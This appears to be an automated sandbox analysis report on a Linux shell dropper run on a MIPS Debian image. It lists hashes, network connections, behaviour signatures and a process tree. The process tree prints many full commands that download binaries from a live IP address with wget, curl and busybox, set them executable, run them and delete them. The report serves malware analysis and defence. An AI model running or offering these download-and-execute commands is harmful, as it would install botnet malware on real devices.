[curl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/bin/chmod
[chmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj
[./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/bin/rm
[rm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/usr/bin/wget
[wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/bin/chmod
[chmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp
[./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/bin/rm
[rm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/usr/bin/wget
[wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/bin/chmod
[chmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67
[./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/bin/rm
[rm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/usr/bin/wget
[wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/bin/chmod
[chmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT
[./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/bin/rm
[rm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/usr/bin/wget
[wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/bin/chmod
[chmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly
[./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/bin/rm
[rm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/usr/bin/wget
[wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/bin/chmod
[chmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m
[./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/bin/rm
[rm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/usr/bin/wget
[wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/bin/chmod
[chmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67
[./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/bin/rm
[rm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/usr/bin/wget
[wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/bin/chmod
[chmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT
[./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/bin/rm
[rm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/usr/bin/wget
[wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/bin/chmod
[chmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp
[./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/bin/rm
[rm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/usr/bin/wget
[wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/bin/chmod
[chmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ
[./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/bin/rm
[rm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/usr/bin/wget
[wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/bin/chmod
[chmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq
[./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/bin/rm
[rm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/usr/bin/wget
[wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/bin/chmod
[chmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N
[./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/bin/rm
[rm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/usr/bin/wget
[wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/bin/chmod
[chmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj
[./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/bin/rm
[rm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/usr/bin/wget
[wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/bin/chmod
[chmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp
[./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/bin/rm
[rm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/usr/bin/wget
[wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/bin/chmod
[chmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S
[./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/bin/rm
[rm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/usr/bin/wget
[wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/804-1-0xb6736000-0xb6747044-memory.dmp
memory/810-2-0xb6780000-0xb6791044-memory.dmp
memory/816-3-0xb6736000-0xb6747044-memory.dmp
memory/884-4-0xb66ed000-0xb66fe044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-21 01:30
Reported
2024-10-21 01:32
Platform
debian9-mipsbe-20240611-en
Max time kernel
96s
Max time network
99s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA | /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA | N/A |
| N/A | /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz | /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz | N/A |
| N/A | /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb | /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb | N/A |
| N/A | /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S | /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S | N/A |
| N/A | /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly | /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly | N/A |
| N/A | /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m | /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m | N/A |
| N/A | /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp | /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp | N/A |
| N/A | /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ | /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ | N/A |
| N/A | /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq | /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq | N/A |
| N/A | /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N | /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N | N/A |
| N/A | /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj | /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj | N/A |
| N/A | /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp | /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp | N/A |
| N/A | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | N/A |
| N/A | /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT | /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT | N/A |
| N/A | /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly | /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly | N/A |
| N/A | /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m | /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m | N/A |
| N/A | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | N/A |
| N/A | /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT | /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT | N/A |
| N/A | /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp | /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp | N/A |
| N/A | /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ | /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ | N/A |
| N/A | /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq | /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq | N/A |
| N/A | /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N | /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N | N/A |
| N/A | /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj | /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj | N/A |
| N/A | /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp | /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp | N/A |
| N/A | /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S | /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S | N/A |
| N/A | /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA | /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA | N/A |
| N/A | /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz | /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz | N/A |
| N/A | /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb | /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N | /usr/bin/curl | N/A |
| File opened for modification | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA | /usr/bin/curl | N/A |
Processes
/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
[/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/bin/chmod
[chmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA
[./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/bin/rm
[rm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/usr/bin/wget
[wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
